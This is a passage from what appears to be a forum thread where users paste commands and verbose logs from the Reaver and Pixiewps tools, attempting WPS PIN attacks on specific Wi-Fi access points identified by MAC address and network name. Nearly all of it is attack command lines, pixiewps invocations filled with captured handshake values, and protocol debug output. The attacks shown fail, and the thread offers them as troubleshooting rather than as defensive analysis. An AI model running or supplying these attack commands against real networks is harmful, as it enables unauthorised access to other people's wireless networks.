DH: private value - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06 2
DH: public value - hexdump(len=192): 45 8d d6 30 7e 59 e4 12 19 0d 34 3a ec e1 30 d7 d1 b6 61 f8 1b ef 19 ed 42 6e fc f2 61 67 0f 46 25 de 1b 37 b1 86
WPS: DH Private Key - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06
WPS: DH own Public Key - hexdump(len=192): 45 8d d6 30 7e 59 e4 12 19 0d 34 3a ec e1 30 d7 d1 b6 61 f8 1b ef 19 ed 42 6e fc f2 61 67 0f 46 25 de 1b 37
WPS: DH Private Key - hexdump(len=192): bc 65 7c d1 4e 18 f8 83 1e 5f aa f4 d3 0d b5 42 7a a4 d9 4e 2d b8 c2 ae a6 d3 6f 8c 92 2e e9 cb 62 7a ee 8f 06
WPS: DH peer Public Key - hexdump(len=192): 55 8b fa 40 d4 15 be f1 6a bf 80 45 06 40 6d ad 17 c2 26 f6 64 ee 0b 29 78 b1 c1 7e b4 d3 2e 8b 0a 5d 97 2
DH: shared key - hexdump(len=192): a3 51 cc 16 45 90 73 9b 04 47 48 5c 36 c2 02 a7 78 70 15 a2 aa 93 51 e4 14 95 39 91 7c 3b 66 1e 3b bc f9 0f 40 f3 e
WPS: DH shared key - hexdump(len=192): a3 51 cc 16 45 90 73 9b 04 47 48 5c 36 c2 02 a7 78 70 15 a2 aa 93 51 e4 14 95 39 91 7c 3b 66 1e 3b bc f9 0f 40
WPS: DHKey - hexdump(len=32): 5f 42 cb 57 80 99 db 15 8d 89 dc 25 bf df 4c fa 64 29 1e 0b e1 07 00 bc b2 fd 4f e4 02 69 e3 26
WPS: KDK - hexdump(len=32): 26 17 a1 9e 6c e4 16 c9 4b 9c e4 61 2d 1d 7e f2 b8 8a b4 55 bb 32 1c 9f 5d 01 fc 12 f2 0e 29 27
WPS: AuthKey - hexdump(len=32): 0a a8 29 70 83 51 9f 5e 80 4d 6a 67 3c e0 c4 81 8e 22 7b 0d 04 55 b5 6e 53 5c 24 4b 1c 34 49 7a
WPS: KeyWrapKey - hexdump(len=16): 02 42 4e 30 cf 51 f7 c9 0a 96 92 ae df 4e fa ec
WPS: EMSK - hexdump(len=32): 20 46 6f da 65 98 59 fd a6 3a 5e 2a 73 bc 26 c1 0f fc 24 9e 03 37 1f fd 74 1f 94 67 3e 43 ce 11
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=114 op_code=4)
WPS: Received WSC_MSG
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): f4 f5 43 ff 63 02 7a d9 fe ff a8 15 d0 55 1d 11 d0 38 b2 ce 0b 41 c0 dc 5e a4 7f 2b c3 47 c2 eb
WPS: E-Hash2 - hexdump(len=32): 12 63 bd 43 70 45 5f 33 df 78 bf 05 36 d2 80 a3 de 12 c3 f9 b6 81 36 2e 91 af b3 b2 19 ff f1 fd
executing pixiewps -e 558bfa40d415bef16abf804506406dad17c226f664ee0b2978 b1c17eb4d32e8b0a5d9727e2075fe5f41978827d1cae18e1f1 dffb96e5abda7834f25b6c7ba57a
Pixiewps 1.4

[-] WPS pin not found!

Time taken: 10 s 317 ms

code reaver -vvv -i mon0 -b 5C:4C:A9:36:90:EC -K 1 -c 1

elidd1

2018-05-04, 21:51

reaver -i wlan1mon -b 00:1D:D4:F9:4C:10 -c 11 -vv -N -Z

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan1mon to channel 11
[+] Waiting for beacon from 00:1D:D4:F9:4C:10
[+] Received beacon from 00:1D:D4:F9:4C:10
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:1D:D4:F9:4C:10 (ESSID: HOME-4C12)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
executing pixiewps -e 46fe047eee49f8c8d7e5011200dac0ad984d4ddd42de801155 be191dfc2d7db06ae2b66a5bbcc64383ec42e6388d0ab0d6d8 adeac661bc13bcc201782d445171b2c4005a1eb0effc8439d1 ed5e6162f118513cae5fec90bf9ef285bba0103fafb8446c3e a8f73c3b8d88faeb2aaaa4506a0c05dea22fc967b8f3be2340 527e720816e2f8e3f1543248833c1d6bae3778792a1824bd04 5120a7ade08aa949a87a4d72b837159de1851f95bf42f96d2a ceb1c22c0b4cd93cbe7514582a7c160f7a -s 035604ba8dc9788ddfcb8abf80ea4543a1620490b4b25f8f80 467feda81c0c17 -z 11f487100e2e6741ea53ddc3e1f169873dec9cd1db30d97a16 7793eeda6761f3 -a 1c592a6f11e8dc56cf298a34eeb7182db238788b2dc9d28cb1 2190cb985adc1e -n f20a06216acc9a3be572bf003d456ead -r a8e2a9af8c7609af0f1e55d46fd8204d33a1b4a7303932cbd6 8b9ef9937a3b9bb5c1444dff6278c74f09c3c071fd4e18ece1 9003ebb1b0285fdb035193ca3d3d695056ae3b420bac62028f dfdbe639ab6679a7f773698da6924caf4a4ff5ad34fe0258dc 5f97178d2054c72d7e5465bb4d301da22dc27c9ff41f7588e6 96a342926f616e44fe58a88d5ea524bf29153cf7373125f6f5 ab884c9f12cd4a23b251792ed88580daecfbb258b07cbac850 f53307ff52915fa7448e04815c6e284b46

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 207 ms

[@] Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps. Follow the instructions on http://0x0.st/tm - Thank you!

chams1012

2018-05-12, 12:54

I Did Run the comand as mentioned above Twice
I also ran Pixiewps with the data collected from reaver with -f
WASH DATA :

bssid" : "1C:5F:2B:06:A4:18", "essid" : "TRIAL", "channel" : 7, "rssi" : -78, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "D-Link Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "RTL8196d", "wps_serial" : "123456789012347", "wps_uuid" : "112233445566778899aa1c5f2b06a418", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "2008", "wps_rf_bands" : "03", "dummy": 0}

__________________________________________________ __________________________________________________ ___

root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 7
[?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
[+] Waiting for beacon from 1C:5F:2B:06:A4:18
[+] Received beacon from 1C:5F:2B:06:A4:18
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
[+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
WPS: Enrollee Nonce - hexdump(len=16): 7e e9 68 0c 07 a7 e6 b2 a1 86 c5 4c 02 e9 74 10
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x2
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 36 05 66 51 0c 1f 98 6a 32 38 17 2b 96 8a 54 6e
WPS: UUID-R - hexdump(len=16): c9 41 d5 da 95 92 a6 97 d7 aa f9 de 6a bf 89 63
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
DH: public value - hexdump(len=192): cd 96 10 77 9f 35 f5 de 13 61 82 8f 80 f7 09 da 98 80 08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c 54 82 ac 46 3b 98 f4 97 55 48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09 1c 0d e1 8c 3e 8b a9 6a 0c 51 ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac e9 fc 73 11 05 90 6c 46 ce 48 32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc 50 e0 99 04 4d 59 e5 72 f8 9c a4 e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5 40 01 1c de e0 16 f9 ca 81 2f 6c f5 58 1c 41 6d b6 74 ec c5 c9 75 9c 48 fc e3 1a 8d d3 01 24 cf 95 cc 09 5c f1 5e 45 f1 24 26 cb d4 31 fa 09 02 20 28 2b 56 f5 8c 53 a7 99 0c 8f 23 f7 e4 0b 1e 38
WPS: DH Private Key - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
WPS: DH own Public Key - hexdump(len=192): cd 96 10 77 9f 35 f5 de 13 61 82 8f 80 f7 09 da 98 80 08 bf ad 71 55 35 81 15 21 bc 5a 59 67 ba 2c 54 82 ac 46 3b 98 f4 97 55 48 61 fc 07 4a e0 ac 90 37 59 ec 73 90 09 1c 0d e1 8c 3e 8b a9 6a 0c 51 ca dc 7f 04 6b 27 86 de 4e d9 dc 97 91 ac e9 fc 73 11 05 90 6c 46 ce 48 32 78 10 9e 94 ea 15 1e 50 7f 65 ef dc 50 e0 99 04 4d 59 e5 72 f8 9c a4 e7 16 af 8f 8a d9 60 f9 f4 e3 61 df f5 40 01 1c de e0 16 f9 ca 81 2f 6c f5 58 1c 41 6d b6 74 ec c5 c9 75 9c 48 fc e3 1a 8d d3 01 24 cf 95 cc 09 5c f1 5e 45 f1 24 26 cb d4 31 fa 09 02 20 28 2b 56 f5 8c 53 a7 99 0c 8f 23 f7 e4 0b 1e 38
WPS: DH Private Key - hexdump(len=192): c6 56 3b a0 fe 3a 86 ba 4f c1 1b bc fc 1d 74 4b 67 15 74 ee 7a c9 f2 6b 89 ee 10 5f 16 d6 b8 62 57 f7 7f 14 f5 10 73 5c b2 84 56 71 ba 69 ed ce 24 6c 46 9a 6c eb e2 23 80 3c 74 3d 4f 0c 84 f9 d7 b7 c5 2a 24 85 09 aa 5e 11 e8 22 f7 a2 f1 9d ef 4d 38 24 00 07 99 38 8e 70 28 cc 02 53 f3 44 23 c0 71 e2 27 73 43 a2 ca a9 22 dc c5 12 cb 3b 3b dc 7b 63 a0 25 91 71 3a a8 ba e7 24 8a 44 19 ae d2 20 c2 52 5e b2 1a f2 25 a4 3c ce 01 85 95 37 3c bd d3 f4 93 f6 18 91 e9 56 82 1a 3b c5 37 b1 6e b0 db 1a 77 a6 0f 13 7c af a3 3a 0f 64 8d d4 f8 b1 5e 0c 62 d5 2f be 22 4f 94 ef 9f ad d0
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52 00 26 ce 47 b2 81 d3 09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc 1c 1e 17 86 76 72 d8 17 8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c fb 4f 42 84 5c 5b 4f 7c 3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9 12 f2 d8 d9 d0 04 7a 5d b9 85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff f2 0f 02 b3 d4 ec c0 68 8a e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36 40 40 be 3b df 40 31 aa 1f 5a 7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6 e1 a2 22 0f 64 01 27 9a b2 1c 90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18 2c 00 2a 56 1b da 18 b4 72 48 a1 30 92 bb 48 84 a7
WPS: DH shared key - hexdump(len=192): 12 61 d7 7f 7a a5 63 2a 82 3d 52 00 26 ce 47 b2 81 d3 09 fb a8 3c 9e dd 9c 7c 21 45 93 95 73 10 4d cc 1c 1e 17 86 76 72 d8 17 8d 54 06 1f 1f 13 bb 8c c0 5c d7 e7 93 f9 99 7c fb 4f 42 84 5c 5b 4f 7c 3b 3d a2 c0 f5 26 29 f8 19 8d ad 1a d7 9e c9 12 f2 d8 d9 d0 04 7a 5d b9 85 c2 9c ea 1b c8 c7 db 5a dc 76 f8 fc 24 ff f2 0f 02 b3 d4 ec c0 68 8a e5 03 5a bf 58 6e d3 e6 c0 20 e2 d3 f5 36 40 40 be 3b df 40 31 aa 1f 5a 7f 8f b8 fe b2 74 02 2b 0c ec 0d 84 b6 d6 e1 a2 22 0f 64 01 27 9a b2 1c 90 a3 a0 7f ce 28 02 0c cb 9e d0 fc 18 2c 00 2a 56 1b da 18 b4 72 48 a1 30 92 bb 48 84 a7
WPS: DHKey - hexdump(len=32): ad 59 c3 66 6f f2 5d 09 2b bf 69 98 dd b9 80 d5 de 15 19 ce 75 d5 52 1d a3 97 20 bb ae f8 d1 4d
WPS: KDK - hexdump(len=32): 30 82 a2 06 ab 4b be bd 8a 3a 69 e1 7d c2 d9 1a 96 e6 97 75 91 19 df 9e 91 d7 40 06 29 b8 64 89
WPS: AuthKey - hexdump(len=32): 01 81 09 14 51 74 29 6a 5f b8 10 2a f6 82 9c b7 b3 40 ae 0e 57 86 76 d3 50 d9 61 14 b9 b1 b1 a8
WPS: KeyWrapKey - hexdump(len=16): 6a f9 5d a3 8b 61 45 e5 ef 9b 76 dd 08 77 cf 0f
WPS: EMSK - hexdump(len=32): dc f8 0d 26 b4 dd f4 bf d5 ec a6 6a b1 22 22 28 1b 08 69 05 72 13 cc ea cb b8 cb 37 7b a0 43 27
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 19 07 d8 f4 f4 8d f6 45 69 75 8c 6f 2d df 38 8c 7b bc 8a bc b5 c9 8c 39 b8 86 5d d9 19 dd 9d 4a
WPS: E-Hash2 - hexdump(len=32): d8 15 59 67 86 d0 4d 68 86 cc 28 76 07 9a 57 5c ce 57 69 9d fc e1 33 2f 30 3c 45 62 01 2c a8 54
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a3 28c0e1baf8cf91664371174c08ee12ec92b0519c54879f2125 5be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1 af1db0c481ead9852c519bf1dd429c163951cf69181b132aea 2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0 ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661 beb73b414032798dadee32b5dd61bf105f18d89217760b75c5 d966a5a490472ceba9e3b4224f3d89fb2b -s 1907d8f4f48df64569758c6f2ddf388c7bbc8abcb5c98c39b8 865dd919dd9d4a -z d815596786d04d6886cc2876079a575cce57699dfce1332f30 3c4562012ca854 -a 018109145174296a5fb8102af6829cb7b340ae0e578676d350 d96114b9b1b1a8 -n 7ee9680c07a7e6b2a186c54c02e97410 -r cd9610779f35f5de1361828f80f709da988008bfad71553581 1521bc5a5967ba2c5482ac463b98f497554861fc074ae0ac90 3759ec7390091c0de18c3e8ba96a0c51cadc7f046b2786de4e d9dc9791ace9fc731105906c46ce483278109e94ea151e507f 65efdc50e099044d59e572f89ca4e716af8f8ad960f9f4e361 dff540011cdee016f9ca812f6cf5581c416db674ecc5c9759c 48fce31a8dd30124cf95cc095cf15e45f12426cbd431fa0902 20282b56f58c53a7990c8f23f7e40b1e38

Pixiewps 1.4

[-] WPS pin not found!

Time taken: 0 s 54 ms

root@kali:~# reaver -i wlan0mon -b 1C:5F:2B:06:A4:18 -c 7 -vvv -K -f

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 7
[?] Restore previous session for 1C:5F:2B:06:A4:18? [n/Y] n
[+] Waiting for beacon from 1C:5F:2B:06:A4:18
[+] Received beacon from 1C:5F:2B:06:A4:18
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:333
send_packet called from authenticate() 80211.c:364
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
send_packet called from associate() 80211.c:417
[+] Sending association request
[+] Associated with 1C:5F:2B:06:A4:18 (ESSID: TRIAL)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
WPS: Processing received message (len=412 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 11 22 33 44 55 66 77 88 99 aa 1c 5f 2b 06 a4 18
WPS: Enrollee MAC Address 1c:5f:2b:06:a4:18
WPS: Enrollee Nonce - hexdump(len=16): ce 12 19 30 9e c2 dc 9b d3 3a 70 ee f8 46 39 5b
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x2688 [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=12):
44 2d 4c 69 6e 6b 20 43 6f 72 70 2e D-Link Corp.
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 78 78 78 RTL8xxx
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 31 30 2d 30 39 2d 32 30 EV-2010-09-20
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=8):
52 54 4c 38 31 39 36 64 RTL8196d
WPS: Enrollee RF Bands 0x2
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 01 42 17 e4 d7 d7 d8 0c 3f f7 90 03 05 9f 47 85
WPS: UUID-R - hexdump(len=16): a2 52 65 da 4e 46 4d cc c2 9e 93 4d 23 8b cf 6d
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
DH: public value - hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7 88 80 b1 4a 34 34 53 13 1f b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd 27 db 68 51 51 77 df 0e 3b a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44 52 26 4d 45 aa 91 ec 8b b8 fe b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32 e4 8a 83 07 25 72 97 3e 2b 8d a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98 a8 25 22 20 98 5a 11 e1 7c 22 13 6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab 58 ec 46 6a 5d 7a 96 63 46 b7 42 62 c4 5c 57 17 57 01 79 66 ba 55 3d 29 8a c4 86 66 0e f3 bc d4 26 73 ca cb 80 c8 25 ee 52 80 9f 9a 9a 54 75 86 98 5d 13 c3 e8 d8 47 fd 99 2d 82 8d 4f c6 ba e8 2a
WPS: DH Private Key - hexdump(len=192): 85 7e a7 22 8a 1a 4e d5 7d 1d 3f 7f e5 b9 a5 8d 11 16 74 f2 05 aa cf ed f9 f7 24 26 a3 59 dd 68 32 f1 6a 13 59 73 bc 9d 1a 79 db 55 23 36 3e 55 14 77 30 cd f5 27 e3 73 73 8d db ba 2d 6a 0b 03 20 8b 9e 11 6a 40 2a f3 ab 99 da b8 7b 54 1d 11 6a 42 95 24 86 01 14 28 45 6f 6e 4b 30 42 eb df d3 64 15 76 50 b6 7d 69 db 1d fc 45 09 7f be 6b 58 17 0a 07 2d 6c 0c 40 ce ad 6c 2d f4 11 bb d0 68 0d 38 21 ae 19 ef 34 e5 84 ed a5 f4 27 c4 d0 3d 33 13 ce 25 8b c1 8a a3 d1 f2 a6 00 a5 b4 4a 79 9a 44 6f 63 80 16 6b 6a 55 06 ad 17 cc ea 9e 76 05 49 98 37 60 12 4a 89 42 b4 fa cd fe 7d 71
WPS: DH own Public Key - hexdump(len=192): 61 68 31 8e b6 a1 b1 8b e7 88 80 b1 4a 34 34 53 13 1f b1 c2 39 11 57 29 83 c5 98 48 51 e4 f7 3e dd 27 db 68 51 51 77 df 0e 3b a4 92 37 1b 89 be 85 96 06 1f e7 99 7a 44 52 26 4d 45 aa 91 ec 8b b8 fe b8 81 0f 34 5c d4 b1 c9 84 63 83 c6 84 32 e4 8a 83 07 25 72 97 3e 2b 8d a5 e1 d0 7c c8 28 0e 94 17 4d a9 cc 98 a8 25 22 20 98 5a 11 e1 7c 22 13 6b fd 30 be 69 16 67 f4 e3 18 6b 52 ab 58 ec 46 6a 5d 7a 96 63 46 b7 42 62 c4 5c 57 17 57 01 79 66 ba 55 3d 29 8a c4 86 66 0e f3 bc d4 26 73 ca cb 80 c8 25 ee 52 80 9f 9a 9a 54 75 86 98 5d 13 c3 e8 d8 47 fd 99 2d 82 8d 4f c6 ba e8 2a
